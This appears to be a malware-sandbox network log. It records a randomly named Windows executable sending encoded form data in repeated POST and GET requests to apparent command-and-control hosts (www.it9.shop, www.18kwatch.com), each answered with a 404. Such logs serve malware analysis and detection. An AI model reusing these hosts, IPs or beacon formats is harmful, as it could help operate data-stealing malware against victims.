                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Host: www.x4wrqqc2tn.sbs
                                                                                      Connection: close
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      17192.168.2.658792121.254.178.239802360C:\Program Files (x86)\nglcwEbNvEhSMeICtmDrzMTVyrxIRFcQJfSdydfvOZvxGXnUPcePsKx\BpYpWzndkWcpUJ.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Sep 30, 2024 10:43:24.612797976 CEST751OUTPOST /ecky/ HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Host: www.it9.shop
                                                                                      Origin: http://www.it9.shop
                                                                                      Referer: http://www.it9.shop/ecky/
                                                                                      Cache-Control: max-age=0
                                                                                      Connection: close
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Content-Length: 211
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
                                                                                      Data Raw: 39 6a 74 50 4b 58 3d 4a 2b 61 6c 50 37 72 59 41 37 30 64 48 4b 6e 4e 74 63 2b 4a 51 30 68 78 4d 66 4e 38 76 7a 75 54 73 59 4c 50 58 73 63 5a 48 50 48 57 61 45 74 6a 6a 65 6b 42 50 4e 74 6e 4a 4c 4e 31 65 76 66 53 59 48 48 79 7a 79 6c 4e 50 62 68 35 73 74 54 51 67 43 43 4e 31 44 74 4e 65 78 49 75 30 4e 49 42 55 4d 53 2b 50 33 76 34 57 47 7a 41 6f 6b 73 4b 52 48 2b 4c 45 30 30 6a 69 72 4c 33 59 70 77 6d 67 36 78 43 34 5a 35 65 6e 71 35 6d 36 62 55 78 2b 31 62 4a 58 64 7a 56 50 38 43 30 69 31 65 63 44 30 36 57 72 4c 4a 47 4d 50 35 6f 6f 69 41 4c 68 55 65 69 41 76 42 75 4a 48 48 62 42 65 56 35 74 35 76 46 47 56 2f 61 62 64 52 59
                                                                                      Data Ascii: 9jtPKX=J+alP7rYA70dHKnNtc+JQ0hxMfN8vzuTsYLPXscZHPHWaEtjjekBPNtnJLN1evfSYHHyzylNPbh5stTQgCCN1DtNexIu0NIBUMS+P3v4WGzAoksKRH+LE00jirL3Ypwmg6xC4Z5enq5m6bUx+1bJXdzVP8C0i1ecD06WrLJGMP5ooiALhUeiAvBuJHHbBeV5t5vFGV/abdRY
                                                                                      Sep 30, 2024 10:43:25.502182007 CEST367INHTTP/1.1 404 Not Found
                                                                                      Date: Mon, 30 Sep 2024 08:43:25 GMT
                                                                                      Server: Apache
                                                                                      Content-Length: 203
                                                                                      Connection: close
                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 65 63 6b 79 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /ecky/ was not found on this server.</p></body></html>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      18192.168.2.658793121.254.178.239802360C:\Program Files (x86)\nglcwEbNvEhSMeICtmDrzMTVyrxIRFcQJfSdydfvOZvxGXnUPcePsKx\BpYpWzndkWcpUJ.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Sep 30, 2024 10:43:27.162957907 CEST775OUTPOST /ecky/ HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Host: www.it9.shop
                                                                                      Origin: http://www.it9.shop
                                                                                      Referer: http://www.it9.shop/ecky/
                                                                                      Cache-Control: max-age=0
                                                                                      Connection: close
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Content-Length: 235
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
                                                                                      Data Raw: 39 6a 74 50 4b 58 3d 4a 2b 61 6c 50 37 72 59 41 37 30 64 48 71 33 4e 75 39 2b 4a 42 6b 68 79 43 2f 4e 38 68 54 75 70 73 59 58 50 58 74 59 7a 48 64 7a 57 62 67 6c 6a 69 62 45 42 4d 4e 74 6e 47 72 4e 38 54 50 66 64 59 48 36 50 7a 33 4e 4e 50 62 64 35 73 73 6a 51 6a 7a 43 4b 33 54 74 50 4c 42 49 73 36 74 49 42 55 4d 53 2b 50 33 36 56 57 43 66 41 76 55 77 4b 51 6d 2b 45 48 30 30 67 31 62 4c 33 63 70 77 63 67 36 78 67 34 59 55 7a 6e 6f 78 6d 36 62 45 78 2b 6b 62 4f 4d 4e 7a 58 42 63 44 46 72 55 6a 2b 4f 58 66 78 72 35 63 72 54 73 42 77 67 30 42 52 39 6e 65 42 53 2f 68 73 4a 46 66 70 42 2b 56 54 76 35 58 46 55 43 7a 39 55 70 30 37 2b 74 6f 4c 36 43 53 65 74 58 39 30 32 32 34 2b 79 38 74 6c 46 67 3d 3d
                                                                                      Data Ascii: 9jtPKX=J+alP7rYA70dHq3Nu9+JBkhyC/N8hTupsYXPXtYzHdzWbgljibEBMNtnGrN8TPfdYH6Pz3NNPbd5ssjQjzCK3TtPLBIs6tIBUMS+P36VWCfAvUwKQm+EH00g1bL3cpwcg6xg4YUznoxm6bEx+kbOMNzXBcDFrUj+OXfxr5crTsBwg0BR9neBS/hsJFfpB+VTv5XFUCz9Up07+toL6CSetX90224+y8tlFg==
                                                                                      Sep 30, 2024 10:43:28.046238899 CEST367INHTTP/1.1 404 Not Found
                                                                                      Date: Mon, 30 Sep 2024 08:43:27 GMT
                                                                                      Server: Apache
                                                                                      Content-Length: 203
                                                                                      Connection: close
                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 65 63 6b 79 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /ecky/ was not found on this server.</p></body></html>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      19192.168.2.658794121.254.178.239802360C:\Program Files (x86)\nglcwEbNvEhSMeICtmDrzMTVyrxIRFcQJfSdydfvOZvxGXnUPcePsKx\BpYpWzndkWcpUJ.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Sep 30, 2024 10:43:29.707602978 CEST1788OUTPOST /ecky/ HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Host: www.it9.shop
                                                                                      Origin: http://www.it9.shop
                                                                                      Referer: http://www.it9.shop/ecky/
                                                                                      Cache-Control: max-age=0
                                                                                      Connection: close
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Content-Length: 1247
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
                                                                                      Data Raw: 39 6a 74 50 4b 58 3d 4a 2b 61 6c 50 37 72 59 41 37 30 64 48 71 33 4e 75 39 2b 4a 42 6b 68 79 43 2f 4e 38 68 54 75 70 73 59 58 50 58 74 59 7a 48 64 72 57 61 53 39 6a 69 39 4d 42 43 74 74 6e 59 62 4e 35 54 50 66 36 59 48 53 44 7a 33 4a 6e 50 64 52 35 6a 71 33 51 69 47 69 4b 2b 54 74 50 4a 42 49 74 30 4e 49 55 55 4d 43 69 50 33 71 56 57 43 66 41 76 57 45 4b 41 48 2b 45 42 30 30 6a 69 72 4c 7a 59 70 78 7a 67 36 35 61 34 59 68 4f 6e 59 52 6d 36 37 30 78 37 57 7a 4f 41 4e 7a 5a 4d 38 44 64 72 55 76 49 4f 58 7a 58 72 34 5a 77 54 76 64 77 7a 46 67 35 71 47 65 6d 51 64 74 66 5a 6c 66 41 4d 5a 56 59 33 36 66 6f 48 42 50 51 54 49 49 41 32 59 49 6e 30 43 72 56 74 41 31 4c 31 54 74 4f 36 38 38 73 47 67 66 6c 76 2b 54 30 33 42 77 35 49 49 6c 59 64 51 38 59 6f 76 30 52 6a 6c 57 62 63 50 6d 72 31 58 6a 2f 6a 64 34 65 70 35 41 70 62 47 6f 41 7a 64 39 63 2b 32 2f 76 57 43 46 61 6e 41 52 4c 2f 4e 45 6c 6f 78 4f 50 44 31 64 4a 51 51 69 58 2b 71 4e 33 2b 77 44 49 75 75 53 75 64 46 32 4f 66 70 7a 30 4e 56 37 4a 64 48 52 [TRUNCATED]
                                                                                      Data Ascii: 9jtPKX=J+alP7rYA70dHq3Nu9+JBkhyC/N8hTupsYXPXtYzHdrWaS9ji9MBCttnYbN5TPf6YHSDz3JnPdR5jq3QiGiK+TtPJBIt0NIUUMCiP3qVWCfAvWEKAH+EB00jirLzYpxzg65a4YhOnYRm670x7WzOANzZM8DdrUvIOXzXr4ZwTvdwzFg5qGemQdtfZlfAMZVY36foHBPQTIIA2YIn0CrVtA1L1TtO688sGgflv+T03Bw5IIlYdQ8Yov0RjlWbcPmr1Xj/jd4ep5ApbGoAzd9c+2/vWCFanARL/NEloxOPD1dJQQiX+qN3+wDIuuSudF2Ofpz0NV7JdHRpDqquBGpgO52nacKBZdyvXWD1iBvVDlTV+hiDynH8MEX0IOzL2Hp1YAaGQXU9x764bIzh3MnX8rG0FAeweKH6DUVEiz2K3kiKHPZLf1gZbcTb6zwG94Ru8TEHvcm7Y2muB1LO8m5+QQxVB8TZXQjaeJ7vuo1vp9efOvtkiYk0YIoQjRLpQ/kzd0WMrM+pnlJU1jlARJ3b+De30YKld1OgFpbYHKwsZzGZni6qz0qc9MItOAT/rYAjIQe47fLnqghTIaCfgt9x/VlvSO6ijaQbI0YAxh7XANLgb8zVpNzZ18MXiE8DE7rG08M3s3VPsfUeokuIRKb5q2YKp4f+eLKYqzU3PNAsGCzmo1bVfp27RBWIFQHAJMehrTsHlVR54tLejnIleR7vLZzce1H0Ap3QgD4WLN4tGoB4IlV62CJV6B+aUCCXZhBb8fZgTm0OsE6kfzCk6q5CrW42B5HfnsAKHROEjoxmpYJ104XHwBq5LwwCt+Gl5sjNxvJbDPcWoCEr/jzKXgKD4CteLZvlvIUb3L/WK4skvcWbZcSwo7tW6dwvvN8ZfS3zJvc9oyv3RyEBuyPnyGGMiHdJsR82+dAkaLYibYLkIeozRAz81myceuxh5hIe2G4X7UbhAE0nU5UIh4tiUQUT0syd+uJOhtIDIcoewhrIsqa3V [TRUNCATED]
                                                                                      Sep 30, 2024 10:43:30.623109102 CEST367INHTTP/1.1 404 Not Found
                                                                                      Date: Mon, 30 Sep 2024 08:43:30 GMT
                                                                                      Server: Apache
                                                                                      Content-Length: 203
                                                                                      Connection: close
                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 65 63 6b 79 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /ecky/ was not found on this server.</p></body></html>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      20192.168.2.658795121.254.178.239802360C:\Program Files (x86)\nglcwEbNvEhSMeICtmDrzMTVyrxIRFcQJfSdydfvOZvxGXnUPcePsKx\BpYpWzndkWcpUJ.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Sep 30, 2024 10:43:32.253868103 CEST500OUTGET /ecky/?9jtPKX=E8yFMNT5NJgwX+ypl/nybltVULshlwvllIqWYsZuB87EHRd+pdJnIfFxHoxvfPrOXGrS+SNOBaUo3+/x93yIjDBeJAA65d0dctOoKHWlJneMt2c+UnLgAV484ZeCTpIzlpd+zvA=&YDT4P=4xd8DzO HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Host: www.it9.shop
                                                                                      Connection: close
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
                                                                                      Sep 30, 2024 10:43:33.189517021 CEST367INHTTP/1.1 404 Not Found
                                                                                      Date: Mon, 30 Sep 2024 08:43:32 GMT
                                                                                      Server: Apache
                                                                                      Content-Length: 203
                                                                                      Connection: close
                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 65 63 6b 79 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /ecky/ was not found on this server.</p></body></html>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      21192.168.2.658796202.87.223.248802360C:\Program Files (x86)\nglcwEbNvEhSMeICtmDrzMTVyrxIRFcQJfSdydfvOZvxGXnUPcePsKx\BpYpWzndkWcpUJ.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Sep 30, 2024 10:43:38.569961071 CEST763OUTPOST /huyu/ HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Host: www.18kwatch.com
                                                                                      Origin: http://www.18kwatch.com
                                                                                      Referer: http://www.18kwatch.com/huyu/
                                                                                      Cache-Control: max-age=0
                                                                                      Connection: close
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Content-Length: 211
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
                                                                                      Data Raw: 39 6a 74 50 4b 58 3d 33 62 64 51 43 51 44 52 61 7a 4a 74 62 45 6b 42 58 4d 61 53 49 64 44 65 32 65 46 69 2b 47 67 4c 75 41 52 69 61 51 2b 50 51 58 61 54 57 44 4b 53 30 69 5a 54 43 47 6d 77 6a 67 77 59 39 54 77 6b 37 49 72 6f 75 75 2b 2b 33 45 62 70 6c 48 66 78 61 4c 4b 79 4e 41 66 34 4e 30 39 45 78 39 4c 31 4b 31 48 31 4f 68 49 6d 6c 2f 76 54 79 7a 62 49 2b 56 33 74 4e 67 72 57 35 43 57 6a 68 69 67 49 46 59 4c 6d 65 51 57 67 46 53 56 71 70 74 4d 74 4c 75 6d 6d 54 66 55 71 77 69 71 78 34 39 6c 79 50 49 54 56 37 48 4e 33 4d 49 45 35 6c 72 4b 54 42 64 78 51 49 2b 72 46 62 57 47 53 7a 2b 33 6f 69 2f 75 57 2f 45 54 38 49 44 55 2f
                                                                                      Data Ascii: 9jtPKX=3bdQCQDRazJtbEkBXMaSIdDe2eFi+GgLuARiaQ+PQXaTWDKS0iZTCGmwjgwY9Twk7Irouu++3EbplHfxaLKyNAf4N09Ex9L1K1H1OhIml/vTyzbI+V3tNgrW5CWjhigIFYLmeQWgFSVqptMtLummTfUqwiqx49lyPITV7HN3MIE5lrKTBdxQI+rFbWGSz+3oi/uW/ET8IDU/
                                                                                      Sep 30, 2024 10:43:39.463545084 CEST426INHTTP/1.1 404 Not Found
                                                                                      Date: Mon, 30 Sep 2024 08:43:39 GMT
                                                                                      Server: Apache
                                                                                      Content-Length: 262
                                                                                      Connection: close
                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 31 38 6b 77 61 74 63 68 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at www.18kwatch.com Port 80</address></body></html>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      22192.168.2.658797202.87.223.248802360C:\Program Files (x86)\nglcwEbNvEhSMeICtmDrzMTVyrxIRFcQJfSdydfvOZvxGXnUPcePsKx\BpYpWzndkWcpUJ.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Sep 30, 2024 10:43:41.118943930 CEST787OUTPOST /huyu/ HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Host: www.18kwatch.com
                                                                                      Origin: http://www.18kwatch.com
                                                                                      Referer: http://www.18kwatch.com/huyu/
                                                                                      Cache-Control: max-age=0
                                                                                      Connection: close
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Content-Length: 235
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
                                                                                      Data Raw: 39 6a 74 50 4b 58 3d 33 62 64 51 43 51 44 52 61 7a 4a 74 62 6e 38 42 61 50 69 53 50 39 44 64 6f 75 46 69 77 6d 67 50 75 48 5a 69 61 51 58 55 51 42 71 54 57 6d 4f 53 31 6a 5a 54 44 47 6d 77 33 77 77 5a 7a 7a 77 56 37 49 33 67 75 71 32 2b 33 41 37 70 6c 46 58 78 62 38 65 31 4d 51 66 36 42 55 39 47 73 4e 4c 31 4b 31 48 31 4f 68 64 4e 6c 2b 48 54 79 41 44 49 2b 32 76 69 4f 67 72 56 38 79 57 6a 6c 69 67 4d 46 59 4c 45 65 53 69 4b 46 51 39 71 70 6f 6f 74 4c 38 4f 6c 63 66 55 73 75 53 71 76 37 4d 45 56 4f 61 75 65 31 30 78 61 51 62 45 54 74 39 4c 4a 64 75 78 7a 61 75 4c 48 62 55 65 67 7a 65 33 43 67 2f 57 57 74 54 66 62 48 33 78 63 44 48 62 2b 55 63 66 33 53 5a 43 68 4f 67 47 58 4e 6e 34 34 5a 51 3d 3d
                                                                                      Data Ascii: 9jtPKX=3bdQCQDRazJtbn8BaPiSP9DdouFiwmgPuHZiaQXUQBqTWmOS1jZTDGmw3wwZzzwV7I3guq2+3A7plFXxb8e1MQf6BU9GsNL1K1H1OhdNl+HTyADI+2viOgrV8yWjligMFYLEeSiKFQ9qpootL8OlcfUsuSqv7MEVOaue10xaQbETt9LJduxzauLHbUegze3Cg/WWtTfbH3xcDHb+Ucf3SZChOgGXNn44ZQ==
                                                                                      Sep 30, 2024 10:43:42.028368950 CEST426INHTTP/1.1 404 Not Found
                                                                                      Date: Mon, 30 Sep 2024 08:43:41 GMT
                                                                                      Server: Apache
                                                                                      Content-Length: 262
                                                                                      Connection: close
                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 31 38 6b 77 61 74 63 68 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at www.18kwatch.com Port 80</address></body></html>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      23192.168.2.658798202.87.223.248802360C:\Program Files (x86)\nglcwEbNvEhSMeICtmDrzMTVyrxIRFcQJfSdydfvOZvxGXnUPcePsKx\BpYpWzndkWcpUJ.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Sep 30, 2024 10:43:43.659212112 CEST1800OUTPOST /huyu/ HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Host: www.18kwatch.com
                                                                                      Origin: http://www.18kwatch.com
                                                                                      Referer: http://www.18kwatch.com/huyu/
                                                                                      Cache-Control: max-age=0
                                                                                      Connection: close
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Content-Length: 1247
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
                                                                                      Data Raw: 39 6a 74 50 4b 58 3d 33 62 64 51 43 51 44 52 61 7a 4a 74 62 6e 38 42 61 50 69 53 50 39 44 64 6f 75 46 69 77 6d 67 50 75 48 5a 69 61 51 58 55 51 42 69 54 58 51 79 53 30 41 78 54 5a 47 6d 77 30 77 77 55 7a 7a 77 49 37 49 2f 6b 75 71 36 41 33 43 44 70 33 51 44 78 4c 5a 69 31 47 51 66 36 4a 30 39 4c 78 39 4c 73 4b 7a 6e 70 4f 68 4e 4e 6c 2b 48 54 79 47 48 49 33 46 33 69 43 41 72 57 35 43 57 76 68 69 68 62 46 59 54 2b 65 53 6d 77 46 68 64 71 70 49 59 74 4b 4a 53 6c 52 66 55 75 76 53 72 38 37 4d 49 4b 4f 65 4f 6a 31 31 46 77 51 5a 59 54 38 71 47 53 45 2b 39 38 4d 76 2f 2b 4f 6d 47 69 7a 34 6e 4f 35 4a 66 76 67 41 62 56 48 6e 68 57 4f 69 2f 58 53 4f 69 4a 54 36 61 57 53 6d 7a 72 62 55 74 77 4c 4c 4c 72 35 48 77 49 2f 67 6e 4a 57 67 33 6f 62 77 53 37 6b 64 41 33 72 37 76 44 62 4d 64 36 65 6a 56 44 62 77 41 41 63 37 62 4a 47 6a 76 56 37 7a 5a 38 4b 75 2b 6c 65 6c 46 35 62 6d 58 4d 30 73 49 72 70 4e 69 55 53 5a 77 76 72 62 4d 49 53 61 35 77 75 54 55 38 71 37 70 58 73 42 4f 34 65 72 64 4e 44 73 65 75 41 63 52 [TRUNCATED]
